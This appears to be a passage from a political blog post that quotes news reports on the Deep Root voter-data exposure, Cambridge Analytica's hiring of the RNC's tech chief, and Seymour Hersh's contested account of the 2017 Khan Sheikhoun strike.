Spreadsheets acquired from TargetPoint, which partnered with Deep Root and GOP Data Trust during the 2016 election, include the home addresses, birthdates, and party affiliations of nearly 200 million registered voters in the 2008 and 2012 presidential elections, as well as some 2016 voters. TargetPoint’s data seeks to resolve questions about where individual voters stand on dozens of political issues. For example: Is the voter eco-friendly? Do they favor lowering taxes? Do they believe the Democrats should stand up to Trump? Do they agree with Trump’s “America First” economic stance? Pharmaceutical companies do great damage: Agree or Disagree?
The details of voters’ likely preferences for issues like stem cell research and gun control were likely drawn from a variety of sources according to a Democratic strategist who spoke with Gizmodo.
“Data like that would be a combination of polling data, real world data from door-knocking and phone-calling and other canvassing activities, coupled with modeling using the data we already have to extrapolate what the voters we don’t know about would think,” the strategist said. “The campaigns that do it right combine all the available data together to make the most robust model for every single voter in the target universe.”
…
Deep Root’s data was exposed after the company updated its security settings on June 1, Lundry said. Deep Root has retained Stroz Friedberg, a cybersecurity and digital forensics firm, to investigate. “Based on the information we have gathered thus far, we do not believe that our systems have been hacked,” Lundry added.
So far, Deep Root doesn’t believe its proprietary data was accessed by any malicious third parties during the 12 days that the data was exposed on the open web.
Deep Root’s server was discovered by UpGuard’s Vickery on the night of June 12 as he was searching for data publicly accessible on Amazon’s cloud service. He used the same process last month to detect sensitive files tied to a US Defense Department project and exposed by an employee of a top defense contractor.
This is not the first leak of voter files uncovered by Vickery, who told Gizmodo that he was alarmed over how the data was apparently being used—some states, for instance, prohibit the commercial use of voter records. Moreover, it was not immediately clear to whom the data belonged. “It was decided that law enforcement should be contacted before attempting any contact with the entity responsible,” said Vickery, who reported that the server was secured two days later on June 14.
A web of data firms funnel research into campaigns
Deep Root’s data sheds light onto the increasingly sophisticated data operation that has fed recent Republican campaigns and lays bare the intricate network of political organizations, PACs, and analysis firms that trade in bulk voter data. In an email to Gizmodo, Deep Root said that its voter models are used to enhance the understanding of TV viewership for political ad buyers. “The data accessed was not built for or used by any specific client,” Lundry said. “It is our proprietary analysis to help inform local television ad buying.”
However, the presence of data on the server from several political organizations, including TargetPoint and Data Trust, suggests that it was used for Republican political campaigns. Deep Root also works primarily with GOP customers (although similar vendors, such as NationBuilder, service the Democrats as well).
Deep Root is one of three data firms hired by the Republican National Committee in the run-up to the 2016 presidential election. Founded by Lundry, a data scientist on the Jeb Bush and Mitt Romney campaigns, the firm was one of three analytics teams that worked on the Trump campaign following the party’s national convention in the summer of 2016.
Lundry’s work brought him into Trump’s campaign war room, according to a post-election AdAge article that charted the GOP’s 2016 data efforts. Deep Root was hand-picked by the RNC’s then-chief of staff, Katie Walsh, in September of last year and joined two other data shops—TargetPoint Consulting and Causeway Solutions—in the effort to win Trump the presidency.
…
To appeal to the three crucial categories, it appears that Trump’s team relied on voter data provided by Data Trust. Complete voter rolls for 2008 and 2012, as well as partial 2016 voter rolls for Florida and Ohio, apparently compiled by Data Trust are contained in the dataset exposed by Deep Root.
Data Trust acquires voter rolls from state officials and then standardizes the voter data to create a clean, manageable record of all registered US voters, a source familiar with the firm’s operations told Gizmodo. Voter data itself is public record and therefore not particularly sensitive, the source added, but the tools Data Trust uses to standardize that data are considered proprietary. That data is then provided to political clients, including analytics firms like Deep Root. While Data Trust requires its clients to protect the data, it has to take clients at their word that industry-standard encryption and security protocols are in place.
TargetPoint and Causeway, the two firms employed by the RNC in addition to Deep Root, apparently layered their own analytics atop the information provided by Data Trust. TargetPoint conducted thousands of surveys per week in 22 states, according to AdAge, gauging voter sentiment on a variety of topics. While Causeway helped manage the data, Deep Root used it to perfect its TV advertising targets—producing voter turnout estimates by county and using that intelligence to target its ad buys.
A source with years of experience working on political campaign data operations told Gizmodo that the data exposed by Deep Root appeared to be customized for the RNC and had apparently been used to create models for turnout and voter preferences. Metadata in the files suggested that the database wasn’t Deep Root’s working copy, but rather a post-election version of its data, the source said, adding that it was somewhat surprising the files hadn’t been discarded.
Because the data from the 2008 and 2012 elections is outdated—the source compared it to the kind of address and phone data one could find on a “lousy internet lookup site”—it’s not very valuable. Even the 2016 data is quickly becoming stale. “This is a proprietary dataset based on a mix of public records, data from commercial providers, and a variety of predictive models of uncertain provenance and quality,” the source said, adding: “Undoubtedly it took millions of dollars to produce.”
Although basic voter information is public record, Deep Root’s dataset contains a swirl of proprietary information from the RNC’s data firms. Many of filenames indicate they potentially contain market research on Democratic candidates and the independent expenditure committees that support them. (Up to two terabytes of data contained on the server was protected by permission settings.)
One exposed folder is labeled “Exxon-Mobile” [sic] and contains spreadsheets apparently used to predict which voters support the oil and gas industry. Divided by state, the files include the voters’ names and addresses, along with a unique RNC identification number assigned to every US citizen registered to vote. Each row indicates where voters likely fall on issues of interest to ExxonMobil, the country’s biggest natural gas producer.
The data evaluates, for example, whether or not a specific voter believes drilling for fossil fuels is vital to US security. It also predicts if the voter thinks the US should be moving away from fossil-fuel use. The ExxonMobil “national score” document alone contains data on 182,746,897 Americans spread across 19 fields.
Reddit analysis
Some of the data included in Deep Root’s dataset veers into downright bizarre territory. A folder titled simply ‘reddit’ houses 170 GBs of data apparently scraped from several subreddits, including the controversial r/fatpeoplehate that was home to a community of people who posted pictures of people and mocked them for their weight before it was banned from Reddit’s platform in 2015. Other subreddits that appear to have been scraped by Deep Root or a partner organization focused on more benign topics, like mountain biking and the Spanish language.
The Reddit data could’ve been used as training data for an artificial intelligence algorithm focused on natural language processing, or it might have been harvested as part of an effort to match up Reddit users with their voter registration records. During the 2012 election cycle, Barack Obama’s campaign data team relied on information gleaned from Facebook profiles and matched profiles to voter records.
During the 2016 election season, Reddit played host to a legion of Trump supporters who gathered in subreddits like r/The_Donald to comb through leaked Democratic National Committee emails and craft pro-Trump memes. Trump himself participated in an “Ask Me Anything” session on r/The_Donald during his campaign.
Given how active some Trump supporters are on Reddit—r/The_Donald currently boasts more than 430,000 members—it makes sense that Trump’s data team might be interested in analyzing data from the site.
A FiveThirtyEight analysis that looked at where r/The_Donald members spend their time when they’re not talking politics might shed some light onto why Deep Root collected r/fatpeoplehate data. FiveThirtyEight found that, when Redditors weren’t commenting in political subreddits, they most often frequented r/fatpeoplehate.
It’s possible that Deep Root intended to use data from r/fatpeoplehate to build a more comprehensive profile of Trump voters. (Lundry declined to comment beyond his initial statement on any of information included in the Deep Root dataset.)
However, FiveThirtyEight’s investigation doesn’t account for Deep Root’s collection of data from mountain-biking and Spanish-speaking subreddits that weren’t as popular with r/The_Donald members—and data from these subreddits that are not so closely linked to Trump’s diehard supporters might be more useful for his campaign’s goal of pursuing swing voters.
“My guess is that they were scraping Reddit posts to match to the voter file as another input for individual modeling,” a source familiar with campaign data operations told Gizmodo. “Given the number of random forums, my guess is they started with a list of accounts to scrape from, rather than scraping from all forums then trying to match from there (in which case you’d start with the political ones).”
Matching voter records with Reddit usernames would be complicated and any large-scale effort would likely result in many inaccuracies, the source said. However, campaigns have attempted to match voter files with social media profiles in the past. Such an effort by Deep Root wouldn’t be entirely surprising, and would likely yield rich data on the small portion of users it was able to match with their voter profiles, the source explained.
Data exposes sensitive voter info
The Deep Root incident represents the largest known leak of Americans’ voter records, outstripping past exposures by several million records. Five voter-file leaks over the past 18 months exposed between 350,000 and 191 million files, some of which paired voter data—name, race, gender, birthdate, address, phone number, party affiliation, etc.—with email accounts, social media profiles, and records of gun ownership.
Campaigns and the data analysis firms they employ are a particularly weak point for data exposure, security experts say. Corporations that don’t properly secure customer data can face significant financial repercussions—just ask Target or Yahoo. But because campaigns are short-term operations, there’s not much incentive for them to take data security seriously, and valuable data is often left out to rust after an election.
“Campaigns are very narrowly focused. They are shoestring operations, even presidential campaigns. So they don’t think of this as an asset they need to protect,” the Center for Democracy and Technology’s Hall told Gizmodo.
Even though voter rolls are public record and are easy to access—Ohio, for instance, makes its voter rolls available to download online—their exposure can still be harmful.
Voter registration records include ZIP codes, birthdates, and other personal information that have been crucial in research efforts to re-identify anonymous medical data. Latanya Sweeney, a professor of government and technology at Harvard University, famously used voter data to re-identify Massachusetts Governor William Weld from information in anonymous hospital discharge records.
Because of the personal information they contain, voter registration databases can also be useful in identity theft schemes.
Even though exposure of Deep Root’s data has the potential to harm voters, it’s exactly the kind of data that campaigns lust after and will spend millions of dollars to obtain. Campaigns are motivated to accumulate as much deeply personal information about voters as possible, so they can spend their ad dollars in the right swing districts where they’re likely to sway the greatest number of voters. But voter data rapidly goes stale and campaigns close up shop quickly, so data is seen as disposable and often isn’t well-protected.
“I can think of no avenues for punishing political data breaches or otherwise properly aligning the incentives. I worry that if there’s no way to punish campaigns for leaking this stuff, it’s going to continue to happen until something bad happens,” Hall said. The data left behind by campaigns can pose a lingering security issue, he added. “None of these motherfuckers were ever Boy Scouts or Girl Scouts, they don’t pack out what they pack in.”
7. Where’s Cambridge Analytica? Did they get access to that data too? They were Trump’s primary Big Data secret weapon. So as this data redundant for them? If not and this data really is of use to Cambridge Analytica, then if we’re trying to think of a likely intended recipient for those terrabytes of data it’s hard to think of a likelier recipient than Cambridge Analytica. Especially after was announced back in January that the RNC’s Big Data guru was heading over to Cambridge Analytica as part of a bid to turn the firm into the RNC’s Big Data firm of choice:
“Trump’s Data Firm Snags RNC Tech Guru Darren Bolding” by Issie Lapowsky; Wired; 01/16/17
British newcomers Cambridge Analytica earned serious bragging rights—and more than a few enemies—as the data firm that helped engineer Donald Trump’s victory in its first US presidential election. Now it’s poaching the Republican National Committee’s chief technology officer, Darren Bolding, in a quest to become the analytics outfit of record for the GOP.
Bolding, who in November, 2015, became the RNC’s third CTO in as many years after building his career as an engineer in Silicon Valley, will assume the title of CTO at Cambridge, where he will build products for commercial and political clients. “We want to be able to scale up what we’re already doing, since there’s been quite a lot of interest from the commercial and political space,” he says.
Cambridge’s pitch is that it divides audiences into “psychographic groups” to target them with the kinds of messages that, like most ads, are based on demographic factors but also are most likely to appeal to their emotional and psychological profiles. The effectiveness of, and methodology behind, these tactics remain the subject of great debate among the Beltway’s traditional data minds, who express skepticism about Cambridge’s ability to deliver on its promises. But Trump’s victory in November was a blow to the firm’s detractors.
Though Cambridge is now pursuing commercial clients through its new office in New York, it’s also expanding its DC operation and hopes to secure government and defense contracts under the Trump administration. Cambridge already has the requisite ties. Not only did it work for the Trump campaign, but Steve Bannon, Trump’s chief strategist, serves on the firm’s board.
Cambridge also is funded by Robert Mercer, the billionaire donor who gave millions to Trump Super PACs and whose daughter Rebekah Mercer serves on the Trump transition team. She reportedlyis involved in shaping the non-profit organization that will serve as a fundraising and messaging vehicle for the Trump administration. That could give Cambridge an advantage in securing its business. Cambridge Analytica declined to comment on these potential deals, and the Trump transition team has not yet responded to WIRED’s request for comment.
Bolding’s departure from the RNC comes as Republicans and Democrats alike grapple with the threat of cyber attacks in the wake of the breach, attributed to Russian hackers, of the Democratic National Committee during the 2016 election. During his press conference this week, president-elect Trump scolded the DNC for allowing such an attack and claimed that hackers were foiled in their attempt to penetrate the Republican National Committee. Bolding confirms the RNC experienced frequent attacks throughout the election cycle. “We were very vigorously attacked,” Bolding says. “I’ve done this for large commercial companies that have had significant threats, but this was really intense.”
While there may have been no breaches of recent RNC data, in a hearing before the Senate Select Committee on Intelligence Tuesday, FBI director James Comey said that “information was harvested” from old RNC email domains that are no longer in use, though none of that information was released.
…
———-
“British newcomers Cambridge Analytica earned serious bragging rights—and more than a few enemies—as the data firm that helped engineer Donald Trump’s victory in its first US presidential election. Now it’s poaching the Republican National Committee’s chief technology officer, Darren Bolding, in a quest to become the analytics outfit of record for the GOP.”
8. Seymour Hersh has a piece in Die Welt about the intelligence that went into the Trump administration’s decision to launch a cruise missile strike against a Syrian airbase following the alleged sarin gas attack on the city of Khan Sheikhoun in Idlib.
So what did the intelligence community know about the attack? Well, the Russian and Syrian air force had in fact informed the US in advance of that airstrike that they had intelligence that top level leaders of Ahrar al-Sham and Jabhat al-Nusra were meeting in that building and they informed of the US of the attack plan in advance of the attack and that it was on a “high-value” target. And the attack involved the unusual use of a guided bomb and Syria’s top pilots. Following the attack, US intelligence concluded that there was no sarin gas attack, Assad wouldn’t have been that politically suicidal, and the symptoms of chemical poisoning following the bombing was likely due to a mixture of chlorine, fertilizers, and other chemicals stored in the building that was targeted by the Syrian airforce created by secondary explosions from the initial bombing.
Key portions of Hersh’s story:
“. . . . The Syrian target at Khan Sheikhoun, as shared with the Americans at Doha, was depicted as a two-story cinder-block building in the northern part of town. Russian intelligence, which is shared when necessary with Syria and the U.S. as part of their joint fight against jihadist groups, had established that a high-level meeting of jihadist leaders was to take place in the building, including representatives of Ahrar al-Sham and the al-Qaida-affiliated group formerly known as Jabhat al-Nusra. The two groups had recently joined forces, and controlled the town and surrounding area. Russian intelligence depicted the cinder-block building as a command and control center that housed a grocery and other commercial premises on its ground floor with other essential shops nearby, including a fabric shop and an electronics store.
‘The rebels control the population by controlling the distribution of goods that people need to live – food, water, cooking oil, propane gas, fertilizers for growing their crops, and insecticides to protect the crops,’ a senior adviser to the American intelligence community, who has served in senior positions in the Defense Department and Central Intelligence Agency, told me. The basement was used as storage for rockets, weapons and ammunition, as well as products that could be distributed for free to the community, among them medicines and chlorine-based decontaminants for cleansing the bodies of the dead before burial. The meeting place – a regional headquarters – was on the floor above. ‘It was an established meeting place,’ the senior adviser said. ‘A long-time facility that would have had security, weapons, communications, files and a map center.’ The Russians were intent on confirming their intelligence and deployed a drone for days above the site to monitor communications and develop what is known in the intelligence community as a POL – a pattern of life. The goal was to take note of those going in and out of the building, and to track weapons being moved back and forth, including rockets and ammunition.
…
Russian and Syrian intelligence officials, who coordinate operations closely with the American command posts, made it clear that the planned strike on Khan Sheikhoun was special because of the high-value target. “It was a red-hot change. The mission was out of the ordinary – scrub the sked,” the senior adviser told me. “Every operations officer in the region” – in the Army, Marine Corps, Air Force, CIA and NSA – “had to know there was something going on. The Russians gave the Syrian Air Force a guided bomb and that was a rarity. They’re skimpy with their guided bombs and rarely share them with the Syrian Air Force. And the Syrians assigned their best pilot to the mission, with the best wingman.” The advance intelligence on the target, as supplied by the Russians, was given the highest possible score inside the American community.
The Execute Order governing U.S. military operations in theater, which was issued by the Chairman of the Joint Chiefs of Staff, provide instructions that demarcate the relationship between the American and Russian forces operating in Syria. “It’s like an ops order – ‘Here’s what you are authorized to do,’” the adviser said. “We do not share operational control with the Russians. We don’t do combined operations with them, or activities directly in support of one of their operations. But coordination is permitted. We keep each other apprised of what’s happening and within this package is the mutual exchange of intelligence. If we get a hot tip that could help the Russians do their mission, that’s coordination; and the Russians do the same for us. When we get a hot tip about a command and control facility,” the adviser added, referring to the target in Khan Sheikhoun, “we do what we can to help them act on it.” “This was not a chemical weapons strike,” the adviser said. “That’s a fairy tale. If so, everyone involved in transferring, loading and arming the weapon – you’ve got to make it appear like a regular 500-pound conventional bomb – would be wearing Hazmat protective clothing in case of a leak. There would be very little chance of survival without such gear. Military grade sarin includes additives designed to increase toxicity and lethality. Every batch that comes out is maximized for death. That is why it is made. It is odorless and invisible and death can come within a minute. No cloud. Why produce a weapon that people can run away from?”
The target was struck at 6:55 a.m. on April 4, just before midnight in Washington. A Bomb Damage Assessment (BDA) by the U.S. military later determined that the heat and force of the 500-pound Syrian bomb triggered a series of secondary explosions that could have generated a huge toxic cloud that began to spread over the town, formed by the release of the fertilizers, disinfectants and other goods stored in the basement, its effect magnified by the dense morning air, which trapped the fumes close to the ground. According to intelligence estimates, the senior adviser said, the strike itself killed up to four jihadist leaders, and an unknown number of drivers and security aides. There is no confirmed count of the number of civilians killed by the poisonous gases that were released by the secondary explosions, although opposition activists reported that there were more than 80 dead, and outlets such as CNN have put the figure as high as 92. A team from Médecins Sans Frontières, treating victims from Khan Sheikhoun at a clinic 60 miles to the north, reported that “eight patients showed symptoms – including constricted pupils, muscle spasms and involuntary defecation – which are consistent with exposure to a neurotoxic agent such as sarin gas or similar compounds.” MSF also visited other hospitals that had received victims and found that patients there “smelled of bleach, suggesting that they had been exposed to chlorine.” In other words, evidence suggested that there was more than one chemical responsible for the symptoms observed, which would not have been the case if the Syrian Air Force – as opposition activists insisted – had dropped a sarin bomb, which has no percussive or ignition power to trigger secondary explosions. The range of symptoms is, however, consistent with the release of a mixture of chemicals, including chlorine and the organophosphates used in many fertilizers, which can cause neurotoxic effects similar to those of sarin.
…A Bomb Damage Assessment (BDA) by the U.S. military later determined that the heat and force of the 500-pound Syrian bomb triggered a series of secondary explosions that could have generated a huge toxic cloud that began to spread over the town, formed by the release of the fertilizers, disinfectants and other goods stored in the basement, its effect magnified by the dense morning air, which trapped the fumes close to the ground. . . . ”
” . . . . The crisis slid into the background by the end of April, as Russia, Syria and the United States remained focused on annihilating ISIS and the militias of al-Qaida. Some of those who had worked through the crisis, however, were left with lingering concerns. ‘The Salafists and jihadists got everything they wanted out of their hyped-up Syrian nerve gas ploy,’ the senior adviser to the U.S. intelligence community told me, referring to the flare up of tensions between Syria, Russia and America. ‘The issue is, what if there’s another false flag sarin attack credited to hated Syria? Trump has upped the ante and painted himself into a corner with his decision to bomb. And do not think these guys are not planning the next faked attack. Trump will have no choice but to bomb again, and harder. He’s incapable of saying he made a mistake.’ . . .”
“Trump‘s Red Line” by Seymour M. Hersh; Welt.de; 06/25/2017
On April 6, United States President Donald Trump authorized an early morning Tomahawk missile strike on Shayrat Air Base in central Syria in retaliation for what he said was a deadly nerve agent attack carried out by the Syrian government two days earlier in the rebel-held town of Khan Sheikhoun. Trump issued the order despite having been warned by the U.S. intelligence community that it had found no evidence that the Syrians had used a chemical weapon.
The available intelligence made clear that the Syrians had targeted a jihadist meeting site on April 4 using a Russian-supplied guided bomb equipped with conventional explosives. Details of the attack, including information on its so-called high-value targets, had been provided by the Russians days in advance to American and allied military officials in Doha, whose mission is to coordinate all U.S., allied, Syrian and Russian Air Force operations in the region.
Some American military and intelligence officials were especially distressed by the president’s determination to ignore the evidence. “None of this makes any sense,” one officer told colleagues upon learning of the decision to bomb. “We KNOW that there was no chemical attack … the Russians are furious. Claiming we have the real intel and know the truth … I guess it didn’t matter whether we elected Clinton or Trump.“
Within hours of the April 4 bombing, the world’s media was saturated with photographs and videos from Khan Sheikhoun. Pictures of dead and dying victims, allegedly suffering from the symptoms of nerve gas poisoning, were uploaded to social media by local activists, including the White Helmets, a first responder group known for its close association with the Syrian opposition.
The provenance of the photos was not clear and no international observers have yet inspected the site, but the immediate popular assumption worldwide was that this was a deliberate use of the nerve agent sarin, authorized by President Bashar Assad of Syria. Trump endorsed that assumption by issuing a statement within hours of the attack, describing Assad’s “heinous actions” as being a consequence of the Obama administration’s “weakness and irresolution” in addressing what he said was Syria’s past use of chemical weapons.
To the dismay of many senior members of his national security team, Trump could not be swayed over the next 48 hours of intense briefings and decision-making. In a series of interviews, I learned of the total disconnect between the president and many of his military advisers and intelligence officials, as well as officers on the ground in the region who had an entirely different understanding of the nature of Syria’s attack on Khan Sheikhoun. I was provided with evidence of that disconnect, in the form of transcripts of real-time communications, immediately following the Syrian attack on April 4. In an important pre-strike process known as deconfliction, U.S. and Russian officers routinely supply one another with advance details of planned flight paths and target coordinates, to ensure that there is no risk of collision or accidental encounter (the Russians speak on behalf of the Syrian military). This information is supplied daily to the American AWACS surveillance planes that monitor the flights once airborne. Deconfliction’s success and importance can be measured by the fact that there has yet to be one collision, or even a near miss, among the high-powered supersonic American, Allied, Russian and Syrian fighter bombers.
Russian and Syrian Air Force officers gave details of the carefully planned flight path to and from Khan Shiekhoun on April 4 directly, in English, to the deconfliction monitors aboard the AWACS plane, which was on patrol near the Turkish border, 60 miles or more to the north.
The Syrian target at Khan Sheikhoun, as shared with the Americans at Doha, was depicted as a two-story cinder-block building in the northern part of town. Russian intelligence, which is shared when necessary with Syria and the U.S. as part of their joint fight against jihadist groups, had established that a high-level meeting of jihadist leaders was to take place in the building, including representatives of Ahrar al-Sham and the al-Qaida-affiliated group formerly known as Jabhat al-Nusra. The two groups had recently joined forces, and controlled the town and surrounding area. Russian intelligence depicted the cinder-block building as a command and control center that housed a grocery and other commercial premises on its ground floor with other essential shops nearby, including a fabric shop and an electronics store.
“The rebels control the population by controlling the distribution of goods that people need to live – food, water, cooking oil, propane gas, fertilizers for growing their crops, and insecticides to protect the crops,” a senior adviser to the American intelligence community, who has served in senior positions in the Defense Department and Central Intelligence Agency, told me. The basement was used as storage for rockets, weapons and ammunition, as well as products that could be distributed for free to the community, among them medicines and chlorine-based decontaminants for cleansing the bodies of the dead before burial. The meeting place – a regional headquarters – was on the floor above. “It was an established meeting place,” the senior adviser said. “A long-time facility that would have had security, weapons, communications, files and a map center.” The Russians were intent on confirming their intelligence and deployed a drone for days above the site to monitor communications and develop what is known in the intelligence community as a POL – a pattern of life. The goal was to take note of those going in and out of the building, and to track weapons being moved back and forth, including rockets and ammunition.
One reason for the Russian message to Washington about the intended target was to ensure that any CIA asset or informant who had managed to work his way into the jihadist leadership was forewarned not to attend the meeting.I was told that the Russians passed the warning directly to the CIA. “They were playing the game right,” the senior adviser said. The Russian guidance noted that the jihadist meeting was coming at a time of acute pressure for the insurgents: Presumably Jabhat al-Nusra and Ahrar al-Sham were desperately seeking a path forward in the new political climate. In the last few days of March, Trump and two of his key national security aides – Secretary of State Rex Tillerson and UN Ambassador Nikki Haley – had made statements acknowledging that, as the New York Times put it, the White House “has abandoned the goal” of pressuring Assad “to leave power, marking a sharp departure from the Middle East policy that guided the Obama administration for more than five years.” White House Press Secretary Sean Spicer told a press briefing on March 31 that “there is a political reality that we have to accept,” implying that Assad was there to stay.
Russian and Syrian intelligence officials, who coordinate operations closely with the American command posts, made it clear that the planned strike on Khan Sheikhoun was special because of the high-value target. “It was a red-hot change. The mission was out of the ordinary – scrub the sked,” the senior adviser told me. “Every operations officer in the region” – in the Army, Marine Corps, Air Force, CIA and NSA – “had to know there was something going on. The Russians gave the Syrian Air Force a guided bomb and that was a rarity. They’re skimpy with their guided bombs and rarely share them with the Syrian Air Force. And the Syrians assigned their best pilot to the mission, with the best wingman.” The advance intelligence on the target, as supplied by the Russians, was given the highest possible score inside the American community.
The Execute Order governing U.S. military operations in theater, which was issued by the Chairman of the Joint Chiefs of Staff, provide instructions that demarcate the relationship between the American and Russian forces operating in Syria. “It’s like an ops order – ‘Here’s what you are authorized to do,’” the adviser said. “We do not share operational control with the Russians. We don’t do combined operations with them, or activities directly in support of one of their operations. But coordination is permitted. We keep each other apprised of what’s happening and within this package is the mutual exchange of intelligence. If we get a hot tip that could help the Russians do their mission, that’s coordination; and the Russians do the same for us. When we get a hot tip about a command and control facility,” the adviser added, referring to the target in Khan Sheikhoun, “we do what we can to help them act on it.” “This was not a chemical weapons strike,” the adviser said. “That’s a fairy tale. If so, everyone involved in transferring, loading and arming the weapon – you’ve got to make it appear like a regular 500-pound conventional bomb – would be wearing Hazmat protective clothing in case of a leak. There would be very little chance of survival without such gear. Military grade sarin includes additives designed to increase toxicity and lethality. Every batch that comes out is maximized for death. That is why it is made. It is odorless and invisible and death can come within a minute. No cloud. Why produce a weapon that people can run away from?”
The target was struck at 6:55 a.m. on April 4, just before midnight in Washington. A Bomb Damage Assessment (BDA) by the U.S. military later determined that the heat and force of the 500-pound Syrian bomb triggered a series of secondary explosions that could have generated a huge toxic cloud that began to spread over the town, formed by the release of the fertilizers, disinfectants and other goods stored in the basement, its effect magnified by the dense morning air, which trapped the fumes close to the ground. According to intelligence estimates, the senior adviser said, the strike itself killed up to four jihadist leaders, and an unknown number of drivers and security aides. There is no confirmed count of the number of civilians killed by the poisonous gases that were released by the secondary explosions, although opposition activists reported that there were more than 80 dead, and outlets such as CNN have put the figure as high as 92. A team from Médecins Sans Frontières, treating victims from Khan Sheikhoun at a clinic 60 miles to the north, reported that “eight patients showed symptoms – including constricted pupils, muscle spasms and involuntary defecation – which are consistent with exposure to a neurotoxic agent such as sarin gas or similar compounds.” MSF also visited other hospitals that had received victims and found that patients there “smelled of bleach, suggesting that they had been exposed to chlorine.” In other words, evidence suggested that there was more than one chemical responsible for the symptoms observed, which would not have been the case if the Syrian Air Force – as opposition activists insisted – had dropped a sarin bomb, which has no percussive or ignition power to trigger secondary explosions. The range of symptoms is, however, consistent with the release of a mixture of chemicals, including chlorine and the organophosphates used in many fertilizers, which can cause neurotoxic effects similar to those of sarin.
The internet swung into action within hours, and gruesome photographs of the victims flooded television networks and YouTube. U.S. intelligence was tasked with establishing what had happened. Among the pieces of information received was an intercept of Syrian communications collected before the attack by an allied nation. The intercept, which had a particularly strong effect on some of Trump’s aides, did not mention nerve gas or sarin, but it did quote a Syrian general discussing a “special” weapon and the need for a highly skilled pilot to man the attack plane. The reference, as those in the American intelligence community understood, and many of the inexperienced aides and family members close to Trump may not have, was to a Russian-supplied bomb with its built-in guidance system. “If you’ve already decided it was a gas attack, you will then inevitably read the talk about a special weapon as involving a sarin bomb,” the adviser said. “Did the Syrians plan the attack on Khan Sheikhoun? Absolutely. Do we have intercepts to prove it? Absolutely. Did they plan to use sarin? No. But the president did not say: ‘We have a problem and let’s look into it.’ He wanted to bomb the shit out of Syria.”
At the UN the next day, Ambassador Haley created a media sensation when she displayed photographs of the dead and accused Russia of being complicit. “How many more children have to die before Russia cares?” she asked. NBC News, in a typical report that day, quoted American officials as confirming that nerve gas had been used and Haley tied the attack directly to Syrian President Assad. “We know that yesterday’s attack was a new low even for the barbaric Assad regime,” she said. There was irony in America’s rush to blame Syria and criticize Russia for its support of Syria’s denial of any use of gas in Khan Sheikhoun, as Ambassador Haley and others in Washington did. “What doesn’t occur to most Americans” the adviser said, “is if there had been a Syrian nerve gas attack authorized by Bashar, the Russians would be 10 times as upset as anyone in the West. Russia’s strategy against ISIS, which involves getting American cooperation, would have been destroyed and Bashar would be responsible for pissing off Russia, with unknown consequences for him. Bashar would do that? When he’s on the verge of winning the war? Are you kidding me?”
Trump, a constant watcher of television news, said, while King Abdullah of Jordan was sitting next to him in the Oval Office, that what had happened was “horrible, horrible” and a “terrible affront to humanity.” Asked if his administration would change its policy toward the Assad government, he said: “You will see.” He gave a hint of the response to come at the subsequent news conference with King Abdullah: “When you kill innocent children, innocent babies – babies, little babies – with a chemical gas that is so lethal … that crosses many, many lines, beyond a red line . … That attack on children yesterday had a big impact on me. Big impact … It’s very, very possible … that my attitude toward Syria and Assad has changed very much.”
Within hours of viewing the photos, the adviser said, Trump instructed the national defense apparatus to plan for retaliation against Syria. “He did this before he talked to anybody about it. The planners then asked the CIA and DIA if there was any evidence that Syria had sarin stored at a nearby airport or somewhere in the area. Their military had to have it somewhere in the area in order to bomb with it.” “The answer was, ‘We have no evidence that Syria had sarin or used it,’” the adviser said. “The CIA also told them that there was no residual delivery for sarin at Sheyrat [the airfield from which the Syrian SU-24 bombers had taken off on April 4] and Assad had no motive to commit political suicide.”Everyone involved, except perhaps the president, also understood that a highly skilled United Nations team had spent more than a year in the aftermath of an alleged sarin attack in 2013 by Syria, removing what was said to be all chemical weapons from a dozen Syrian chemical weapons depots.
At this point, the adviser said, the president’s national security planners were more than a little rattled: “No one knew the provenance of the photographs. We didn’t know who the children were or how they got hurt. Sarin actually is very easy to detect because it penetrates paint, and all one would have to do is get a paint sample. We knew there was a cloud and we knew it hurt people. But you cannot jump from there to certainty that Assad had hidden sarin from the UN because he wanted to use it in Khan Sheikhoun.” The intelligence made clear that a Syrian Air Force SU-24 fighter bomber had used a conventional weapon to hit its target: There had been no chemical warhead. And yet it was impossible for the experts to persuade the president of this once he had made up his mind. “The president saw the photographs of poisoned little girls and said it was an Assad atrocity,” the senior adviser said. “It’s typical of human nature. You jump to the conclusion you want. Intelligence analysts do not argue with a president. They’re not going to tell the president, ‘if you interpret the data this way, I quit.’”
The national security advisers understood their dilemma: Trump wanted to respond to the affront to humanity committed by Syria and he did not want to be dissuaded. They were dealing with a man they considered to be not unkind and not stupid, but his limitations when it came to national security decisions were severe. “Everyone close to him knows his proclivity for acting precipitously when he does not know the facts,” the adviser said. “He doesn’t read anything and has no real historical knowledge. He wants verbal briefings and photographs. He’s a risk-taker. He can accept the consequences of a bad decision in the business world; he will just lose money. But in our world, lives will be lost and there will be long-term damage to our national security if he guesses wrong. He was told we did not have evidence of Syrian involvement and yet Trump says: ‘Do it.”’
On April 6, Trump convened a meeting of national security officials at his Mar-a-Lago resort in Florida. The meeting was not to decide what to do, but how best to do it – or, as some wanted, how to do the least and keep Trump happy. “The boss knew before the meeting that they didn’t have the intelligence, but that was not the issue,” the adviser said. “The meeting was about, ‘Here’s what I’m going to do,’ and then he gets the options.”
The available intelligence was not relevant. The most experienced man at the table was Secretary of Defense James Mattis, a retired Marine Corps general who had the president’s respect and understood, perhaps, how quickly that could evaporate. Mike Pompeo, the CIA director whose agency had consistently reported that it had no evidence of a Syrian chemical bomb, was not present. Secretary of State Tillerson was admired on the inside for his willingness to work long hours and his avid reading of diplomatic cables and reports, but he knew little about waging war and the management of a bombing raid. Those present were in a bind, the adviser said. “The president was emotionally energized by the disaster and he wanted options.” He got four of them, in order of extremity. Option one was to do nothing. All involved, the adviser said, understood that was a non-starter. Option two was a slap on the wrist: to bomb an airfield in Syria, but only after alerting the Russians and, through them, the Syrians, to avoid too many casualties. A few of the planners called this the “gorilla option”: America would glower and beat its chest to provoke fear and demonstrate resolve, but cause little significant damage. The third option was to adopt the strike package that had been presented to Obama in 2013, and which he ultimately chose not to pursue. The plan called for the massive bombing of the main Syrian airfields and command and control centers using B1 and B52 aircraft launched from their bases in the U.S. Option four was “decapitation”: to remove Assad by bombing his palace in Damascus, as well as his command and control network and all of the underground bunkers he could possibly retreat to in a crisis.
